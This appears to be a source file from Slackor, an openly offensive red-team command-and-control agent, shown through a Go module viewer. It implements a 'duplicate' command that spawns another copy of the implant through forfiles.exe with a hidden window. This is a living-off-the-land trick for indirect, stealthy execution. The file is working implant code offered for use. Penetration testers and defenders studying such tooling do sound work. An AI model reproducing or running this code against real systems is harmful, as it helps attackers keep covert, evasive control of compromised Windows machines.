github.com/Coalfire-Research/Slackor@v0.0.0-20191010164036-aa32a7f9250b/pkg/windows/duplicate.go

github.com/Coalfire-Research/Slackor@v0.0.0-20191010164036-aa32a7f9250b/pkg/windows/duplicate.go (about)

     1  // +build windows
     2  
     3  package windows
     4  
     5  import (
     6  	"bytes"
     7  	"fmt"
     8  	"os"
     9  	"os/exec"
    10  	"syscall"
    11  
    12  	"github.com/Coalfire-Research/Slackor/pkg/command"
    13  )
    14  
    15  // Duplicate spawns a new agent using forfiles.exe
    16  type Duplicate struct{}
    17  
    18  // Name is the name of the command
    19  func (d Duplicate) Name() string {
    20  	return "duplicate"
    21  }
    22  
    23  // Run spawns a new agent using forfiles.exe
    24  func (d Duplicate) Run(clientID string, jobID string, args []string) (string, error) {
    25  	cmdName := "forfiles.exe"
    26  	cmd := exec.Command(cmdName)
    27  	cmdArgs := []string{"/p", `c:\windows\system32`, "/m", "svchost.exe", "/c", os.Args[0]}
    28  	cmd = exec.Command(cmdName, cmdArgs...)
    29  	var out bytes.Buffer
    30  	var stderr bytes.Buffer
    31  	cmd.Stdout = &out
    32  	cmd.Stderr = &stderr
    33  	cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
    34  	err := cmd.Run()
    35  	if err != nil {
    36  		return "", err
    37  	}
    38  	return fmt.Sprintf("Duplicated %s.", os.Args[0]), nil
    39  }
    40  
    41  func init() {
    42  	command.RegisterCommand(Duplicate{})
    43  }